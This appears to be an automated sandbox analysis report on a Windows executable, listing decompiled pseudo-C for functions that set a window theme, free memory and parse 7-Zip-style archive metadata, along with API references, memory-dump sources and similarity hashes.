                                          • LoadLibraryA.KERNEL32(uxtheme,?,0040911C,000004B1,00000000,?,?,?,?,?,00409247), ref: 00407E35
                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407E46
                                          • GetWindow.USER32(?,00000005), ref: 00407E5F
                                          • GetWindow.USER32(00000000,00000002), ref: 00407E75
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$AddressLibraryLoadProc
                                          • String ID: SetWindowTheme$uxtheme
                                          • API String ID: 324724604-1369271589
                                          • Opcode ID: d1c83f497be9f3305c1235a4c67dcd356e2801ac202c84af436c6d730c55ae95
                                          • Instruction ID: 5403b67bd050cf209916d056b79971b0f3c2a1a79c5b52a930c6f53153313152
                                          • Opcode Fuzzy Hash: d1c83f497be9f3305c1235a4c67dcd356e2801ac202c84af436c6d730c55ae95
                                          • Instruction Fuzzy Hash: B2F0A776E4672533C6316366AC48F877B5C9B45B60B0605B6FD04F7380DA6CEC4181ED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00418480, Relevance: 10.5, APIs: 7, Instructions: 34COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E00418480(intOrPtr* __ecx) {
				intOrPtr _t20;
				intOrPtr* _t22;
				intOrPtr* _t28;

				 *__ecx = 0;
				_push( *((intOrPtr*)(__ecx + 8)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x24)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x2c)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x30)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x34)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				_push( *((intOrPtr*)(__ecx + 0x38)));
				L0041C160();
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				_t22 = __ecx + 0x3c;
				_pop(_t27);
				_t28 = _t22;
				_t20 =  *_t28;
				if(_t20 != 0) {
					_push(_t20);
					L0041C160();
					 *_t28 = 0;
				}
				 *((intOrPtr*)(_t28 + 4)) = 0;
				return _t20;
			}






                                          0x00418486
                                          0x00418488
                                          0x0041848b
                                          0x00418490
                                          0x00418493
                                          0x00418496
                                          0x00418499
                                          0x0041849c
                                          0x0041849f
                                          0x004184a4
                                          0x004184a7
                                          0x004184aa
                                          0x004184af
                                          0x004184b2
                                          0x004184b5
                                          0x004184ba
                                          0x004184bd
                                          0x004184c0
                                          0x004184c5
                                          0x004184c8
                                          0x004184cb
                                          0x004184d0
                                          0x004184d3
                                          0x004184d6
                                          0x004184de
                                          0x004184e2
                                          0x004184e5
                                          0x0040b6c1
                                          0x0040b6c3
                                          0x0040b6c7
                                          0x0040b6c9
                                          0x0040b6ca
                                          0x0040b6d2
                                          0x0040b6d2
                                          0x0040b6d8
                                          0x0040b6e0

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: f70be27807797ce7c26ea69ed98ffc78a6c2594a131c428ecde169c1c0b094d5
                                          • Instruction ID: f1de91cbc462ee97d673e7db93c01427bec84cd42ac756398f0c521e5fe4e4e7
                                          • Opcode Fuzzy Hash: f70be27807797ce7c26ea69ed98ffc78a6c2594a131c428ecde169c1c0b094d5
                                          • Instruction Fuzzy Hash: DE01C471480B54ABC2316F17CD85847FEF1FF94B04340591FA08602932C7B5B891DF48
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419DAA, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 354COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00419DAA(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a7, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t223;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t249;
				intOrPtr _t254;
				void* _t256;
				void* _t257;
				void* _t258;
				signed char _t260;
				intOrPtr _t264;
				void* _t269;
				signed int _t270;
				void* _t271;
				signed int _t275;
				signed int _t295;
				intOrPtr _t297;
				intOrPtr _t310;
				signed int _t314;
				intOrPtr _t316;
				signed int _t317;
				char _t319;
				signed int _t321;
				signed int _t326;
				signed int _t333;
				void* _t334;
				intOrPtr _t335;
				intOrPtr* _t336;
				signed int _t338;
				void* _t347;
				void* _t348;

				_t349 = __eflags;
				_t347 = __ecx;
				E00419816(__ecx, __edx, _t334, __eflags, 0xb, 0);
				_t223 = E00418FE5( *((intOrPtr*)(__ecx + 0x38)), __edx, __ecx, __eflags);
				_v12 = _v12 & 0x00000000;
				_t335 = _t223;
				_v32 = _t335;
				_v64 = 0;
				E00419747( &_v68, __edx, _t348, __eflags, _t347, _a4);
				_t275 = _a8;
				_t11 = _t335 + 1; // 0x1
				_v28 =  *((intOrPtr*)( *(_t347 + 0x38) + 8)) +  *( *(_t347 + 0x38));
				 *((intOrPtr*)(_t275 + 4)) = _t335;
				_a4 = _t11;
				E0041914B(E0041911E(_t275 + 0x30, __eflags, _t11), _t275 + 0x34, _t335);
				E0041911E(_t275 + 0x38, _t349, _a4);
				_t336 = _t275 + 0x2c;
				E0041911E(_t336, _t349, _v32 + 1);
				_t233 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_v44 = 0;
				_v20 =  *(_t347 + 0x38);
				_v24 = 0;
				_t350 = _v32;
				if(_v32 > 0) {
					while(1) {
						_t337 = _v24;
						_t326 =  *((intOrPtr*)( *(_t347 + 0x38) + 8)) - _v28 +  *( *(_t347 + 0x38));
						 *( *(_t275 + 0x38) + _v24 * 4) = _t326;
						_t288 = _v20;
						_v40 = _t233;
						_a8 = _t233;
						_t234 = E00418FE5(_v20, _t326, _t347, __eflags);
						_v8 = _t234;
						__eflags = _t234;
						if(_t234 == 0) {
							break;
						}
						__eflags = _t234 - 0x40;
						if(_t234 > 0x40) {
							break;
						}
						_v36 = _v36 & 0x00000000;
						__eflags = _t234;
						if(_t234 == 0) {
							L37:
							_t288 = 1;
							__eflags = _t234 - 1;
							if(_t234 != 1) {
								L40:
								_t337 = _a8;
								__eflags = _a8 - _t234 - 1;
								if(__eflags < 0) {
									break;
								}
								E00419725( &_v92, _t337, __eflags);
								_t338 = _v8;
								E00419725( &_v80, _t338, __eflags);
								_a4 = _a4 & 0x00000000;
								_t337 = _t338 - 1;
								__eflags = _t337;
								_v36 = _t337;
								if(__eflags == 0) {
									L47:
									_t337 = _a8 - _v36;
									_v36 = _t337;
									__eflags = _t337 - 1;
									if(_t337 == 1) {
										L52:
										_t245 = 0;
										__eflags = 0 - _v8;
										if(__eflags >= 0) {
											L58:
											if(__eflags == 0) {
												break;
											}
											L59:
											_t246 = _v24;
											_t295 = _v12;
											_t336 = _t275 + 0x2c;
											 *((intOrPtr*)( *_t336 + _t246 * 4)) = _t295;
											_v12 = _t295 + _v8;
											_t297 = _v44;
											 *((intOrPtr*)( *((intOrPtr*)(_t275 + 0x30)) + _t246 * 4)) = _t297;
											_v44 = _t297 + _v36;
											 *((char*)(_t246 +  *((intOrPtr*)(_t275 + 0x34)))) = _v40;
											_t247 = _t246 + 1;
											_v24 = _t247;
											__eflags = _t247 - _v32;
											if(_t247 < _v32) {
												_t233 = 0;
												__eflags = 0;
												continue;
											}
											goto L1;
										} else {
											goto L53;
										}
										while(1) {
											L53:
											_t288 = _v80;
											__eflags =  *((char*)(_t288 + _t245));
											if( *((char*)(_t288 + _t245)) == 0) {
												break;
											}
											_t245 = _t245 + 1;
											__eflags = _t245 - _v8;
											if(_t245 < _v8) {
												continue;
											}
											L57:
											__eflags = _t245 - _v8;
											goto L58;
										}
										_v40 = _t245;
										goto L57;
									}
									_a4 = _a4 & 0x00000000;
									__eflags = _t337;
									if(__eflags == 0) {
										goto L52;
									} else {
										goto L49;
									}
									while(1) {
										L49:
										_t288 = _v20;
										_t256 = E00418FE5(_v20, _t326, _t347, __eflags);
										__eflags = _t256 - _a8;
										if(_t256 >= _a8) {
											goto L61;
										}
										_t288 = _v92;
										__eflags =  *((char*)(_t256 + _t288));
										if( *((char*)(_t256 + _t288)) != 0) {
											goto L61;
										}
										_a4 = _a4 + 1;
										 *((char*)(_t256 + _t288)) = 1;
										__eflags = _a4 - _t337;
										if(__eflags < 0) {
											continue;
										}
										goto L52;
									}
									break;
								} else {
									goto L42;
								}
								while(1) {
									L42:
									_t288 =  *(_t347 + 0x38);
									_t257 = E00418FE5( *(_t347 + 0x38), _t326, _t347, __eflags);
									__eflags = _t257 - _a8;
									if(_t257 >= _a8) {
										goto L61;
									}
									_t288 = _v92;
									__eflags =  *((char*)(_t257 + _t288));
									if(__eflags != 0) {
										goto L61;
									}
									 *((char*)(_t257 + _t288)) = 1;
									_t288 =  *(_t347 + 0x38);
									_t258 = E00418FE5( *(_t347 + 0x38), _t326, _t347, __eflags);
									__eflags = _t258 - _v8;
									if(_t258 >= _v8) {
										goto L61;
									}
									_t288 = _v80;
									__eflags =  *((char*)(_t258 + _t288));
									if( *((char*)(_t258 + _t288)) != 0) {
										goto L61;
									}
									_a4 = _a4 + 1;
									 *((char*)(_t258 + _t288)) = 1;
									__eflags = _a4 - _v36;
									if(__eflags < 0) {
										continue;
									}
									goto L47;
								}
								break;
							}
							__eflags = _a8 - 1;
							if(_a8 != 1) {
								goto L40;
							}
							_v40 = _v40 & 0x00000000;
							_v36 = 1;
							goto L59;
						} else {
							goto L8;
						}
						while(1) {
							L8:
							_t337 = _v20;
							_t288 = _t337;
							_t260 = E00418E7C(_t337, _t337);
							_a7 = _t260;
							__eflags = _t260 & 0x000000c0;
							if((_t260 & 0x000000c0) != 0) {
								goto L61;
							}
							_t288 = _t260 & 0xf;
							_v52 = _t288;
							__eflags = _t288 - 8;
							if(_t288 > 8) {
								goto L61;
							}
							_t326 =  *(_t337 + 8);
							__eflags = _t288 -  *((intOrPtr*)(_t337 + 4)) - _t326;
							if(_t288 >  *((intOrPtr*)(_t337 + 4)) - _t326) {
								L62:
								_t236 = E00418DE4(_t288, _t337);
								L63:
								__eflags = _t236 - 0xa;
								if(_t236 != 0xa) {
									L66:
									E00419315( *(_t347 + 0x38), _t326);
									L67:
									_t236 = E00418FB1( *(_t347 + 0x38));
									if((_t236 | _t326) != 0) {
										goto L63;
									}
									return _t236;
								}
								__eflags = _t326;
								if(__eflags != 0) {
									goto L66;
								}
								E00419C68(_t347, __eflags, _v32, _t275 + 0xc);
								goto L67;
							}
							_v60 = _v60 & 0x00000000;
							_v56 = _v56 & 0x00000000;
							_v16 = _v16 & 0x00000000;
							_t264 =  *_t337 + _t326;
							_v48 = _t264;
							__eflags = _t288;
							if(_t288 == 0) {
								L16:
								 *(_t337 + 8) =  *(_t337 + 8) + _t288;
								__eflags =  *((intOrPtr*)(_t275 + 0x50)) - 0x80;
								if( *((intOrPtr*)(_t275 + 0x50)) < 0x80) {
									_t288 = _t275 + 0x4c;
									E00419957(_t275 + 0x4c, _v60, _v56);
								}
								__eflags = _a7 & 0x00000010;
								_v16 = 1;
								if(__eflags == 0) {
									L21:
									_a8 = _a8 + _v16;
									__eflags = _a8 - 0x40;
									if(_a8 > 0x40) {
										goto L61;
									}
									__eflags = _a7 & 0x00000020;
									if(__eflags == 0) {
										L35:
										_v36 = _v36 + 1;
										__eflags = _v36 - _v8;
										if(_v36 < _v8) {
											continue;
										}
										_t234 = _v8;
										goto L37;
									}
									_t269 = E00418FE5(_t337, _t326, _t347, __eflags);
									_t288 =  *((intOrPtr*)(_t337 + 4)) -  *(_t337 + 8);
									__eflags = _t269 -  *((intOrPtr*)(_t337 + 4)) -  *(_t337 + 8);
									if(_t269 >  *((intOrPtr*)(_t337 + 4)) -  *(_t337 + 8)) {
										goto L62;
									}
									__eflags = _v60 - 0x21;
									if(_v60 != 0x21) {
										L29:
										__eflags = _v60 - 0x30101;
										if(_v60 == 0x30101) {
											__eflags = _v56;
											if(_v56 == 0) {
												__eflags = _t269 - 5;
												if(_t269 == 5) {
													_t314 =  *(_t347 + 0x38);
													_t326 =  *(_t314 + 8);
													_t316 =  *((intOrPtr*)(_t326 +  *_t314 + 1));
													__eflags =  *((intOrPtr*)(_t275 + 0x48)) - _t316;
													if( *((intOrPtr*)(_t275 + 0x48)) < _t316) {
														 *((intOrPtr*)(_t275 + 0x48)) = _t316;
													}
												}
											}
										}
										L34:
										_t149 = _t337 + 8;
										 *_t149 =  *(_t337 + 8) + _t269;
										__eflags =  *_t149;
										goto L35;
									}
									__eflags = _v56;
									if(_v56 != 0) {
										goto L29;
									}
									__eflags = _t269 - 1;
									if(_t269 == 1) {
										_t317 =  *(_t347 + 0x38);
										_t326 =  *(_t317 + 8);
										_t319 =  *((intOrPtr*)(_t326 +  *_t317));
										__eflags =  *((intOrPtr*)(_t275 + 0x44)) - _t319;
										if( *((intOrPtr*)(_t275 + 0x44)) < _t319) {
											 *((char*)(_t275 + 0x44)) = _t319;
										}
									}
									goto L34;
								} else {
									_t288 = _t337;
									_t270 = E00418FE5(_t337, _t326, _t347, __eflags);
									_v16 = _t270;
									__eflags = _t270 - 0x40;
									if(__eflags > 0) {
										goto L61;
									}
									_t288 = _t337;
									_t271 = E00418FE5(_t337, _t326, _t347, __eflags);
									__eflags = _t271 - 1;
									if(_t271 != 1) {
										goto L61;
									}
									goto L21;
								}
							} else {
								goto L14;
								L14:
								_t321 = _v60;
								asm("cdq");
								_t288 = _v52;
								_t326 = _t326 | (_v56 << 0x00000020 | _t321) << 0x8;
								_v16 = _v16 + 1;
								_v60 =  *(_v16 + _t264) & 0x000000ff | _t321 << 0x00000008;
								_v56 = _t326;
								__eflags = _v16 - _t288;
								if(_v16 < _t288) {
									_t264 = _v48;
									goto L14;
								} else {
									_t337 = _v20;
									goto L16;
								}
							}
						}
						break;
					}
					L61:
					E00418E04(_t288);
					goto L62;
				}
				L1:
				_t249 = _v24;
				 *((intOrPtr*)( *_t336 + _t249 * 4)) = _v12;
				 *((intOrPtr*)( *((intOrPtr*)(_t275 + 0x30)) + _t249 * 4)) = _v44;
				_t326 =  *(_t275 + 0x38);
				 *((intOrPtr*)(_t326 + _t249 * 4)) =  *((intOrPtr*)( *(_t347 + 0x38) + 8)) - _v28 +  *( *(_t347 + 0x38));
				E0040BF30(_t275 + 0x3c, _v28,  *((intOrPtr*)( *(_t347 + 0x38) + 8)) - _v28 +  *( *(_t347 + 0x38)));
				_push(_v80);
				L0041C160();
				_push(_v92);
				L0041C160();
				E00418E1D( &_v68);
				E00419816(_t347, _t326,  *((intOrPtr*)( *(_t347 + 0x38) + 8)) - _v28 +  *( *(_t347 + 0x38)), _t350, 0xc, 0);
				E004190F1(_t275 + 0x28, _t350, _v12);
				_a4 = _a4 & 0x00000000;
				if(_v12 <= 0) {
					goto L67;
				} else {
					goto L2;
				}
				do {
					L2:
					_t254 = E00418FB1( *(_t347 + 0x38));
					_t310 =  *((intOrPtr*)(_t275 + 0x28));
					_v64 = _t326;
					_t333 = _a4;
					 *((intOrPtr*)(_t310 + _t333 * 8)) = _t254;
					 *(_t310 + 4 + _t333 * 8) = _v64;
					_t326 = _t333 + 1;
					_a4 = _t326;
				} while (_t326 < _v12);
				goto L67;
			}






























































                                          0x00419daa
                                          0x00419db7
                                          0x00419db9
                                          0x00419dc1
                                          0x00419dc9
                                          0x00419dcd
                                          0x00419dd3
                                          0x00419dd6
                                          0x00419ddc
                                          0x00419de9
                                          0x00419dec
                                          0x00419def
                                          0x00419df6
                                          0x00419df9
                                          0x00419e05
                                          0x00419e10
                                          0x00419e19
                                          0x00419e1f
                                          0x00419e27
                                          0x00419e29
                                          0x00419e2c
                                          0x00419e2f
                                          0x00419e32
                                          0x00419e35
                                          0x00419e38
                                          0x00419e3b
                                          0x00419e3e
                                          0x00419e41
                                          0x00419e44
                                          0x00419e47
                                          0x00419ef2
                                          0x00419efb
                                          0x00419efe
                                          0x00419f03
                                          0x00419f06
                                          0x00419f09
                                          0x00419f0c
                                          0x00419f0f
                                          0x00419f14
                                          0x00419f17
                                          0x00419f19
                                          0x00000000
                                          0x00000000
                                          0x00419f1f
                                          0x00419f22
                                          0x00000000
                                          0x00000000
                                          0x00419f28
                                          0x00419f2c
                                          0x00419f2e
                                          0x0041a091
                                          0x0041a093
                                          0x0041a094
                                          0x0041a096
                                          0x0041a0a9
                                          0x0041a0a9
                                          0x0041a0ad
                                          0x0041a0af
                                          0x00000000
                                          0x00000000
                                          0x0041a0b8
                                          0x0041a0bd
                                          0x0041a0c3
                                          0x0041a0c8
                                          0x0041a0cc
                                          0x0041a0cc
                                          0x0041a0cd
                                          0x0041a0d0
                                          0x0041a121
                                          0x0041a124
                                          0x0041a127
                                          0x0041a12a
                                          0x0041a12d
                                          0x0041a159
                                          0x0041a159
                                          0x0041a15b
                                          0x0041a15e
                                          0x0041a177
                                          0x0041a177
                                          0x00000000
                                          0x00000000
                                          0x0041a179
                                          0x0041a179
                                          0x0041a17c
                                          0x0041a17f
                                          0x0041a184
                                          0x0041a18d
                                          0x0041a190
                                          0x0041a193
                                          0x0041a19c
                                          0x0041a1a2
                                          0x0041a1a5
                                          0x0041a1a6
                                          0x0041a1a9
                                          0x0041a1ac
                                          0x00419ef0
                                          0x00419ef0
                                          0x00000000
                                          0x00419ef0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a160
                                          0x0041a160
                                          0x0041a160
                                          0x0041a163
                                          0x0041a167
                                          0x00000000
                                          0x00000000
                                          0x0041a169
                                          0x0041a16a
                                          0x0041a16d
                                          0x00000000
                                          0x00000000
                                          0x0041a174
                                          0x0041a174
                                          0x00000000
                                          0x0041a174
                                          0x0041a171
                                          0x00000000
                                          0x0041a171
                                          0x0041a12f
                                          0x0041a133
                                          0x0041a135
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a137
                                          0x0041a137
                                          0x0041a137
                                          0x0041a13a
                                          0x0041a13f
                                          0x0041a142
                                          0x00000000
                                          0x00000000
                                          0x0041a144
                                          0x0041a147
                                          0x0041a14b
                                          0x00000000
                                          0x00000000
                                          0x0041a14d
                                          0x0041a150
                                          0x0041a154
                                          0x0041a157
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a157
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a0d2
                                          0x0041a0d2
                                          0x0041a0d2
                                          0x0041a0d5
                                          0x0041a0da
                                          0x0041a0dd
                                          0x00000000
                                          0x00000000
                                          0x0041a0e3
                                          0x0041a0e6
                                          0x0041a0ea
                                          0x00000000
                                          0x00000000
                                          0x0041a0f0
                                          0x0041a0f4
                                          0x0041a0f7
                                          0x0041a0fc
                                          0x0041a0ff
                                          0x00000000
                                          0x00000000
                                          0x0041a105
                                          0x0041a108
                                          0x0041a10c
                                          0x00000000
                                          0x00000000
                                          0x0041a112
                                          0x0041a115
                                          0x0041a11c
                                          0x0041a11f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041a11f
                                          0x00000000
                                          0x0041a0d2
                                          0x0041a098
                                          0x0041a09b
                                          0x00000000
                                          0x00000000
                                          0x0041a09d
                                          0x0041a0a1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00419f34
                                          0x00419f34
                                          0x00419f34
                                          0x00419f37
                                          0x00419f39
                                          0x00419f3e
                                          0x00419f41
                                          0x00419f43
                                          0x00000000
                                          0x00000000
                                          0x00419f4c
                                          0x00419f4f
                                          0x00419f52
                                          0x00419f55
                                          0x00000000
                                          0x00000000
                                          0x00419f5b
                                          0x00419f63
                                          0x00419f65
                                          0x0041a1bc
                                          0x0041a1bc
                                          0x0041a1c1
                                          0x0041a1c1
                                          0x0041a1c4
                                          0x0041a1da
                                          0x0041a1dd
                                          0x0041a1e2
                                          0x0041a1e5
                                          0x0041a1ee
                                          0x00000000
                                          0x00000000
                                          0x0041a1f4
                                          0x0041a1f4
                                          0x0041a1c6
                                          0x0041a1c8
                                          0x00000000
                                          0x00000000
                                          0x0041a1d3
                                          0x00000000
                                          0x0041a1d3
                                          0x00419f6d
                                          0x00419f71
                                          0x00419f75
                                          0x00419f79
                                          0x00419f7b
                                          0x00419f7e
                                          0x00419f80
                                          0x00419fb4
                                          0x00419fb9
                                          0x00419fbc
                                          0x00419fc3
                                          0x00419fc8
                                          0x00419fce
                                          0x00419fce
                                          0x00419fd3
                                          0x00419fd7
                                          0x00419fde
                                          0x0041a003
                                          0x0041a006
                                          0x0041a009
                                          0x0041a00d
                                          0x00000000
                                          0x00000000
                                          0x0041a013
                                          0x0041a017
                                          0x0041a07f
                                          0x0041a07f
                                          0x0041a085
                                          0x0041a088
                                          0x00000000
                                          0x00000000
                                          0x0041a08e
                                          0x00000000
                                          0x0041a08e
                                          0x0041a01b
                                          0x0041a023
                                          0x0041a026
                                          0x0041a028
                                          0x00000000
                                          0x00000000
                                          0x0041a02e
                                          0x0041a032
                                          0x0041a054
                                          0x0041a054
                                          0x0041a05b
                                          0x0041a05d
                                          0x0041a061
                                          0x0041a063
                                          0x0041a066
                                          0x0041a068
                                          0x0041a06b
                                          0x0041a070
                                          0x0041a074
                                          0x0041a077
                                          0x0041a079
                                          0x0041a079
                                          0x0041a077
                                          0x0041a066
                                          0x0041a061
                                          0x0041a07c
                                          0x0041a07c
                                          0x0041a07c
                                          0x0041a07c
                                          0x00000000
                                          0x0041a07c
                                          0x0041a034
                                          0x0041a038
                                          0x00000000
                                          0x00000000
                                          0x0041a03a
                                          0x0041a03d
                                          0x0041a03f
                                          0x0041a042
                                          0x0041a047
                                          0x0041a04a
                                          0x0041a04d
                                          0x0041a04f
                                          0x0041a04f
                                          0x0041a04d
                                          0x00000000
                                          0x00419fe0
                                          0x00419fe0
                                          0x00419fe2
                                          0x00419fe7
                                          0x00419fea
                                          0x00419fed
                                          0x00000000
                                          0x00000000
                                          0x00419ff3
                                          0x00419ff5
                                          0x00419ffa
                                          0x00419ffd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00419ffd
                                          0x00419f82
                                          0x00419f82
                                          0x00419f87
                                          0x00419f8e
                                          0x00419f9b
                                          0x00419f9e
                                          0x00419fa1
                                          0x00419fa3
                                          0x00419fa6
                                          0x00419fa9
                                          0x00419fac
                                          0x00419faf
                                          0x00419f84
                                          0x00000000
                                          0x00419fb1
                                          0x00419fb1
                                          0x00000000
                                          0x00419fb1
                                          0x00419faf
                                          0x00419f80
                                          0x00000000
                                          0x00419f34
                                          0x0041a1b7
                                          0x0041a1b7
                                          0x00000000
                                          0x0041a1b7
                                          0x00419e4d
                                          0x00419e5d
                                          0x00419e60
                                          0x00419e69
                                          0x00419e78
                                          0x00419e81
                                          0x00419e84
                                          0x00419e89
                                          0x00419e8c
                                          0x00419e91
                                          0x00419e94
                                          0x00419e9e
                                          0x00419ea9
                                          0x00419eb4
                                          0x00419eb9
                                          0x00419ec1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00419ec7
                                          0x00419ec7
                                          0x00419eca
                                          0x00419ecf
                                          0x00419ed2
                                          0x00419ed5
                                          0x00419ed8
                                          0x00419ede
                                          0x00419ee2
                                          0x00419ee3
                                          0x00419ee6
                                          0x00000000

                                          APIs
                                            • Part of subcall function 0041911E: ??3@YAXPAX@Z.MSVCRT ref: 00419123
                                            • Part of subcall function 0041911E: ??2@YAPAXI@Z.MSVCRT ref: 0041913E
                                            • Part of subcall function 0041914B: ??3@YAXPAX@Z.MSVCRT ref: 00419150
                                            • Part of subcall function 0041914B: ??2@YAPAXI@Z.MSVCRT ref: 0041915C
                                            • Part of subcall function 0040BF30: ??3@YAXPAX@Z.MSVCRT ref: 0040BF44
                                            • Part of subcall function 0040BF30: ??2@YAPAXI@Z.MSVCRT ref: 0040BF5E
                                            • Part of subcall function 0040BF30: memcpy.MSVCRT ref: 0040BF78
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00419E8C
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00419E94
                                            • Part of subcall function 004190F1: ??3@YAXPAX@Z.MSVCRT ref: 004190F6
                                            • Part of subcall function 004190F1: ??2@YAPAXI@Z.MSVCRT ref: 00419111
                                            • Part of subcall function 00419725: memset.MSVCRT ref: 0041973D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@$memcpymemset
                                          • String ID: $!$@
                                          • API String ID: 1807930983-2517134481
                                          • Opcode ID: f179f206ab315a89253d4d1cae131543762475f9238fa3fe184e8bee0db2a210
                                          • Instruction ID: 3ffa3ad4b5ccc8a9926622aa3f55e201b9f90fd758da49e30c43fec7e53f582a
                                          • Opcode Fuzzy Hash: f179f206ab315a89253d4d1cae131543762475f9238fa3fe184e8bee0db2a210
                                          • Instruction Fuzzy Hash: 48E15C74901209EFCF14DF95C590AEDBBB2BF49314F24805EE806AB352DB39A9D1CB49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401368, Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E00401368() {
				signed int _v8;
				signed int _v12;
				void* __ecx;
				signed int _t31;
				signed int _t33;
				signed int _t34;
				intOrPtr* _t35;
				long _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t41;
				signed int _t49;
				void* _t51;
				signed int _t66;
				void* _t69;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;

				_push(_t51);
				_push(_t51);
				_t69 = _t51;
				if(( *0x422774 & 0x00000040) != 0) {
					L19:
					_t31 = 0;
					L20:
					return _t31;
				}
				_t76 =  *0x422704;
				if( *0x422704 > 0) {
					goto L19;
				}
				_t77 = E00401303(_t51, _t76);
				if(_t77 == 0) {
					goto L19;
				}
				_t33 = E0040115F(_t69);
				_t66 = 4;
				_t49 = _t33;
				_t34 = _t33 * _t66;
				_push( ~(0 | _t77 > 0x00000000) | _t34);
				L0041C16C();
				_t73 = 0;
				_v12 = _t34;
				_v8 = 0;
				if(_t49 <= 0) {
					L8:
					_push(_v12);
					L0041C160();
					goto L19;
				} else {
					goto L4;
				}
				do {
					L4:
					_t35 = E00407272(_t73);
					if(_t35 != 0) {
						_t35 = _v12;
						_v8 = _v8 + 1;
						 *((intOrPtr*)(_t35 + _v8 * 4)) = _t73;
					}
					_t73 = _t73 + 1;
				} while (_t73 < _t49);
				if(_v8 != 0) {
					_push(0x14);
					L0041C16C();
					__eflags = _t35;
					if(_t35 == 0) {
						_t74 = 0;
						__eflags = 0;
					} else {
						_t74 = E00401238(_t35, _t35);
					}
					__eflags = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)( *_t74 + 4))(_t74);
					}
					_t36 = GetTickCount();
					 *(_t69 + 0x88) = _t36;
					_t22 = _t69 + 8; // 0x9d2680
					_t37 =  *_t22;
					_t38 =  *((intOrPtr*)( *_t37 + 0x1c))(_t37, _v12, _v8, 0, _t74);
					__eflags = _t38;
					if(_t38 != 0) {
						L17:
						_push(_v12);
						L0041C160();
						__eflags = _t74;
						if(_t74 != 0) {
							 *((intOrPtr*)( *_t74 + 8))(_t74);
						}
						goto L19;
					} else {
						_t41 =  *((intOrPtr*)(_t74 + 0xc));
						__eflags =  *((intOrPtr*)(_t41 + 0x10));
